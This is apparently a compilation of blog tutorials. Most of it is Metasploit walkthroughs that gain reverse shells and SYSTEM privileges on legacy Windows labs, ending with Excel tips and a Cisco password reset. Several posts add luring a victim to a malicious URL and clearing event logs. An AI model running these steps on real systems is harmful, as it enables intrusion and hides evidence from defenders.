How to Hack Windows Server 2003 Using MS07_029 Vulnerability


Disclaimer – This tutorial is for educational purposes only.

In this post, I will show you how to hack Windows Server 2003 Using MS07_029 Vulnerability.

Requirements for this lab

  • Kali Linux
  • Windows Server 2003

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6>use exploit/windows/dcerpc/ms07_029_msdns_zonename

[*] No payload configured, defaulting to windows/shell/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need local IP address, remote PC IP Address.

Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > set rhost 192.168.1.76

Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > set lhost 192.168.1.89

After entering this command press enter. The IP I have given is of my local kali linux machine Your’s could be different. Check it using ip addr command.

Running the exploit

Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > run

After entering this command press enter.

After pressing enter, the exploit will attempt to execute the payload. After execution of the payload you will see the DOS Shell.

C:\WINDOWS\system32>

You can view the video below of this lab.

How to Hack Windows XP SP2 Using NCT Audio File2 v2.x


Disclaimer – This tutorial is for educational purposes only.

In this post, I will show you how to hack windows XP SP2 Using NCT Audio File2 v2.x

Requirements for this lab

  • Kali Linux
  • Windows XP SP2
  • NCT Audio File2 v2.x (Obtain From here).

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit
  • Getting the admin access of the target system.

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6>use exploit/windows/browser/nctaudiofile2_setformatlikesample

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need local IP address, port number 8080 and a URIPATH.

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > set srvhost 192.168.1.89

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > set uripath tech

After entering this command press enter. The IP I have given is of my local kali linux machine Your’s could be different. Check it using ip addr command.

Running the exploit

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > run

After entering this command press enter. For this particular exploit, the exploit will be hosted on the kali linux system. You need to give this url to the victim by some means.

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > [*] Using URL http://192.168.1.89:8080/tech

After the victim opens this URL, the meterpreter sesssion will be opened. You can check the session number with the session id command.

Msf6 exploit (use exploit/windows/browser/nctaudiofile2_setformatlikesample) > sessions -i [I referes to ID]

After you pass this session ID parameter, you will see the meterpreter prompt.

Meterpreter>

Getting the admin access of the target system

Meterpreter>getsystem

After entering this command press enter. This will give you the admin privileges of the target system.

You can also watch the tutorial of this lab on Bitchute.

How to Hack Windows XP SP2 Using MS06_067 Vulnerability


Disclaimer – This tutorial is for educational purposes only.

In this post, I will show you how to hack windows XP SP2 using MS06_067 Vulnerability.

Requirements for this lab

  • Kali Linux
  • Windows XP SP2

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit
  • Getting the admin access of the target system.

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6>use exploit/windows/browser/ms06_067_keyframe

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need remote local IP address and remote port 8080 needs to be opened on the target machine and URIPATH need to be specified.

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > set srvhost 192.168.1.89

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > set uripath tech

After entering this command press enter. The IP I have given is of my local kali linux machine Your’s could be different. Check it using ip addr command.

Running the exploit

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > run

After entering this command press enter. For this particular exploit, the exploit will be hosted on the kali linux system. You need to give this url to the victim by some means.

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > [*] Using URL http://192.168.1.89:8080/tech

After the victim opens this URL, the meterpreter sesssion will be opened. You can check the session number with the session id command.

Msf6 exploit (use exploit/windows/browser/ms06_067_keyframe) > sessions -i [I referes to ID]

After you pass this session ID parameter, you will see the meterpreter prompt.

Meterpreter>

Getting the admin access of the target system

Meterpreter>getsystem

After entering this command press enter. This will give you the admin privileges of the target system.

You can also watch the below video of this lab.

How to Hack Windows XP SP3 using Winamp 5.12


Disclaimer – This tutorial is for educational purposes only.

In this post, I will show you how to hack windows XP SP3 using Winamp 5.12

Requirements for this lab

  • Kali Linux
  • Windows XP SP3
  • Winamp 5.12 (Download from here).

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit
  • Getting the admin access of the target system

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6>use exploit/windows/browser/winamp_playlist_unc

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need remote local IP address and remote port 8080 needs to be opened on the target machine and URIPATH need to be specified.

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > set srvhost 192.168.1.89

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > set uripath winamp

After entering this command press enter. The IP I have given is of my local kali linux machine Your’s could be different. Check it using ip addr command.

Running the exploit

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > run

After entering this command press enter. For this particular exploit, the exploit will be hosted on the kali linux system. You need to give this url to the victim by some means.

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > [*] Using URL http://192.168.1.89:8080/winamp

After the victim opens this URL, the meterpreter sesssion will be opened. You can check the session number with the session id command.

Msf6 exploit (use exploit/windows/browser/winamp_playlist_unc) > sessions -i [I referes to ID]

After you pass this session ID parameter, you will see the meterpreter prompt.

Meterpreter>

Getting the admin access of the target system

Meterpreter>getsystem

After entering this command press enter. This will give you the admin privileges of the target system.

You can also view the full demonstration of this lab in below video.

How to Hack Windows XP SP3 using Mozilla Firefox 1.0.4


In this post, I will show you how to hack windows XP SP3 using Mozilla Firefox 1.0.4

Requirements for this lab

  • Kali Linux
  • Windows XP SP3
  • Mozilla Firefox 1.0.4 (Download from here).

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit
  • Getting the admin access of the target system
  • Clear the event log of the target system

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6>use exploit/multi/browser/mozilla_compareto

[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need remote local IP address and remote port 8080 needs to be opened on the target machine and URIPATH need to be specified.

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > set srvhost 192.168.1.89

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > set uripath tech

After entering this command press enter. The IP I have given is of my local kali linux machine Your’s could be different. Check it using ip addr command.

Running the exploit

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > run

After entering this command press enter. For this particular exploit, the exploit will be hosted on the kali linux system. You need to give this url to the victim by some means.

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > [*] Using URL http://192.168.1.89:8080/tech

After the victim opens this URL, the meterpreter sesssion will be opened. You can check the session number with the session id command.

Msf6 exploit (use exploit/multi/browser/mozilla_compareto) > sessions -i [I referes to ID]

After you pass this session ID parameter, you will see the meterpreter prompt.

Meterpreter>

Getting the admin access of the target system

Meterpreter>getsystem

After entering this command press enter. This will give you the admin privileges of the target system.

Clear the Event Logs of the Target System

Meterpreter>clearev

After entering this command, press enter. This will clear all the event logs on the target machine.

You can also watch the video below.

How to Hack Windows XP SP3 using Icecast 2.0.1


In this post, I will show you how to hack windows XP SP3 using Icecast 2.0.1

Requirements for this lab

  • Kali Linux
  • Windows XP SP3
  • Icecast 2.0.1 (Download from here).

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit
  • Getting the admin access of the target system
  • Getting the local time of the target system

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6> use exploit/windows/http/icecast_header

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/windows/http/icecast_header) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/windows/http/icecast_header) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need remote host IP address and remote port 8080 needs to be opened on the target machine.

Msf6 exploit (use exploit/windows/http/icecast_header) > set rhosts 192.168.1.98

After entering this command press enter. The exploit will run shortly. It will validate first all the required options that were needed to run this exploit. After the successful exploitation, you will see the meterpreter shell like shown below, so that you can further exploit the target system.

After entering this command press enter. The IP here belongs to my own network, so check your local IP before entering the IP address.

This command will also show you the payload options which are automatically set, if you want to change, you can change here.

Running the exploit

Msf6 exploit (use exploit/windows/http/icecast_header) > run

After entering this command press enter. The exploit will run shortly. It will validate first all the required options that were needed to run this exploit. After the successful exploitation, you will see the meterpreter shell like shown below, so that you can further exploit the target system.

Getting the admin access of the target system

Meterpreter>getsystem

After entering this command press enter. This will give you the admin privileges of the target system.

Getting the local time of the target system

Meterpreter>localtime

After entering this command, press enter. This will show you the local time of the target system.

You can also watch the below video.

How to Hack Windows XP SP0 using MS03-026 Vulnerability


In this post, I will show you how to hack windows XP SP0 using MS03-026 Vulnerability.

Requirements for this lab

  • Kali Linux
  • Windows XP SP0

Exploitation Steps

  • Opening Metasploit
  • Selecting the exploit
  • Getting information about the exploit
  • Setting options to run the exploit
  • Running the exploit

Opening Metasploit

(kali@kali)-[~]$ msfconsole –q

(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.

Selecting the Exploit

Msf6> use exploit/windows/dcerpc/ms03_026_dcom

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

After selecting the exploit, press enter.

Getting information about the exploit

Msf6 exploit (use exploit/windows/dcerpc/ms03_026_dcom) > info

After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.

Setting options to run the exploit

Msf6 exploit (use exploit/windows/dcerpc/ms03_026_dcom) > options

After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need remote host IP address and remote port 135 needs to be opened on the target machine.

Msf6 exploit (use exploit/windows/dcerpc/ms03_026_dcom) > set rhosts 192.168.1.100

This command will also show you the payload options which are automatically set, if you want to change, you can change here. For this exploit, we need to supply local host or lhost IP address.

The IP which I have mentioned is of my own system, Yours could be different. So verify it before setting the target host.

Msf6 exploit (use exploit/windows/dcerpc/ms03_026_dcom) > set lhost 192.168.1.89

Running the exploit

Msf6 exploit (use exploit/windows/dcerpc/ms03_026_dcom) > run

After entering this command press enter. The exploit will run shortly. It will validate first all the required options that were needed to run this exploit. After the successful exploitation, you will see the meterpreter shell like shown below, so that you can further exploit the target system.

Meterpreter>

You can also watch the video of this tutorial below.

How to Change Cell Selector Movement in Excel


Introduction

Whenever we enter any text or value in excel, the cursor automatically shifts to the next row. We can change this behavior of excel, because generally when we enter something in excel, we want sometimes to edit the same cell or don’t want the cursor to go to next cell, so to change this “cell selector movement” in excel, do the below mentioned steps.

  • Click on File Button.
  • Click on Options. After you click on options button, the Excel options dialog box will appear on your screen .
  • On the excel options dialog box, Click on Advanced Tab.
  • Under Advanced Tab, under Editing options, uncheck “After pressing Enter, move selection” check box and then click on OK Button.

So in this way you can change cell selector movement in excel. You can also watch the video of this lab below.

How to Compute SUM in Excel Using 5 Different Ways


Introduction

In this post, I am going to show you how to compute SUM using 5 different ways in excel.

Requirements of this practical

  • Microsoft Excel (Any Version)

Steps to Follow

  • Entering Values
  • Implementing Method 1 to compute SUM.
  • Implementing Method 2 to compute SUM.
  • Implementing Method 3 to compute SUM.
  • Implementing Method 4 to compute SUM.
  • Implementing Method 5 to compute SUM.

Entering Values


First of all type some values in Excel like this.

  • In cell A1 type 10
  • In cell A2 type 20
  • In cell A3 type 30
  • In cell A4 type 40

Implementing Method 1 to compute SUM.

First of all, place your cursor in cell A5. On the home tab, under editing group, double click on AutoSum button. This will automatically compute the sum for you.

Implementing Method 2 to compute SUM

In this method we will type the formula manually. Place your cursor in cell A5. Type =sum(A1:A4) and press enter. This will compute the sum for you. The equal to sign is used because every formula in excel begins with equal to (=) sign. The formula sum(A1:A4) selects all the cells between A1 and A4.

Implementing Method 3 to Compute SUM

In this method we will add each cell address manually. Place your cursor in cell A5. Type =sum(A1+A2+A3+A4) and press enter. This will compute the SUM for you.

Implementing Method 4 to Compute SUM

This method is bit tricky. Place your cursor in cell A5. Type sum=( and select the cell A1 and press colon (:) from the keyboard. The colon will lock the cell. Now drag the cell using mouse all the way down to A4. This will compute the SUM for you.

Implementing Method 5 to compute SUM

Place your cursor in cell A5. Type =sum(A1 and drag the cursor all the way down to A4. This will compute the SUM for you.

You can also watch video of this post on YouTube.

How to reset forgotten Cisco router password


In this post, I will tell you how to reset forgotten Cisco Router password.

Requirements for this lab

  • 1 Cisco 2911 Router
  • 1 Cisco console cable
  • 1 PC with Putty Software installed

Topology Diagram

Configuration Steps

  • Cabling the console connection between router and PC
  • Entering the rommon mode
  • Changing the configuration register bit and restarting the router.
  • Changing the configuration-register bit to default value and restart the router
  • Review the changes.

Cabling the console connection between router and PC

Connect the console cable to PC’s serial port or DB-9 port and connect one end of the cable (RJ-45 connector) to console port of the cisco router and restart the router. Use your favourite ssh client like putty and choose serial option while connecting over console session.

Entering the rommon mode

After restarting your router, press Ctrl+Pause Break key from your keyboard to enter into rommon mode. If you’re using laptop, press Fn+Pause Break Key to enter into rommon mode. The prompt of rommon mode will look like written below.

rommon1>

Changing the configuration register bit and restarting the router

In the rommon mode, you can issue the help command to see which set of commands work under rommon mode.

To change the default register value type confreg 0x2142 and press enter.

After pressing enter, issue the reset command to restart the router.

Changing the configuration-register bit to default value and restart the router

After restarting the router, you will be greeted by system configuration message with Yes/No message. Simply enter no and press enter.

Now you can enter the privileged access mode without any password from user mode. Now it is the time to change the register value to its default value. If you don’t change the register value back to its original value then no changes will be saved and if you reboot your router, you will be greeted by the system configuration message.

To change the register value to the default value, follow these steps.

Router>enable

Router#configuration terminal

Router(config)#config-register 0x2102

Router(config)#exit

Now in privilege mode, use the show version command to see the register value that is currently set and on the next reboot it will be changed to 0x2102. You will see a similar message at the end of the show version command.

Configuration register is 0x2142 (will be 0x2102 at next reload).

For the testing purpose, change the hostname of your router, so that after reboot, it is ensured that our changes have been saved.

Router#configuration terminal

Router(config)#hostname techsolutions

Router(config)#exit

Router#reboot

Review the changes

After rebooting the router, if the changes of hostname remains intact, that means the router has saved the configuration and the register value can be checked via show version command that should be showing 0x2102 now.

You can also view the YouTube video of this tutorial below.